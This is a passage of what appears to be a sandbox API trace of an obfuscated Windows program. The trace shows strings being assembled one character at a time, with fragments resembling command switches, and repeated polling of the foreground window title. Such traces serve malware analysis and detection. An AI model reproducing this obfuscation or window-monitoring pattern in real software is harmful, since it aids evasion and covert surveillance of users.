pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0086.504] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.505] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.505] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.505] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.506] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0086.506] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0086.506] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.507] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.507] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.507] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.508] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.508] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.508] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.509] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.509] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.510] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.510] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.510] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.510] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.511] GetForegroundWindow () returned 0x102c2 [0086.511] GetLastError () returned 0x0 [0086.511] SysStringLen (param_1=" ") returned 0xff [0086.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0086.511] SysStringLen (param_1=" ") returned 0xff [0086.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0086.511] GetWindowTextA (in: hWnd=0x102c2, lpString=0xe577bc, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0086.511] GetLastError () returned 0x0 [0086.512] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0086.512] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0086.512] SysStringLen (param_1="Act") returned 0x3 [0086.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Act", cchWideChar=4, lpMultiByteStr=0xe4a94c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Act", lpUsedDefaultChar=0x0) returned 4 [0086.512] SetWindowTextA (hWnd=0x2036e, lpString="Act") returned 1 [0086.512] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0086.512] GetFocus () returned 0x0 [0086.513] lstrlenA (lpString="Act") returned 3 [0086.513] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe4a94c) returned 0x1 [0086.513] IsWindow (hWnd=0x2036e) returned 1 [0086.513] IsWindow (hWnd=0x2036e) returned 1 [0086.513] IsWindow (hWnd=0x2036e) returned 1 [0086.513] IsWindow (hWnd=0x2036e) returned 1 [0086.514] GetFocus () returned 0x0 [0086.514] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0086.514] GetFocus () returned 0x0 [0086.514] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x4) returned 0x310bcd0 [0086.514] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x4, lParam=0x310bcd0) returned 0x3 [0086.514] GetFocus () returned 0x0 [0086.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Act", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0086.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Act", cbMultiByte=-1, lpWideCharStr=0xe4a94c, cchWideChar=4 | out: lpWideCharStr="Act") returned 4 [0086.514] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0086.514] VarCmp (pvarLeft=0x28f180, pvarRight=0x28f1e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0086.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0086.515] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0086.516] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0086.516] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0086.516] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0086.517] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0086.517] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.518] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.518] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0086.518] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0086.518] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0086.519] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0086.519] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0086.520] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0086.520] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0086.521] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0086.521] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.522] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.522] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.522] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.523] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0086.523] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0086.523] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.524] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.524] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.524] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.524] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0086.525] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.525] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0086.525] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.526] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.526] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.526] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.526] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.527] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.527] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.528] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.528] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.528] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.528] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.529] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.529] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0086.529] GetForegroundWindow () returned 0x102c2 [0086.529] GetLastError () returned 0x0 [0086.529] SysStringLen (param_1=" ") returned 0xff [0086.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0086.529] SysStringLen (param_1=" ") returned 0xff [0086.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0086.529] GetWindowTextA (in: hWnd=0x102c2, lpString=0xe577bc, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0086.530] GetLastError () returned 0x0 [0086.530] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0086.530] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.530] MultiByteToWideChar (in: CodePage=0x0, 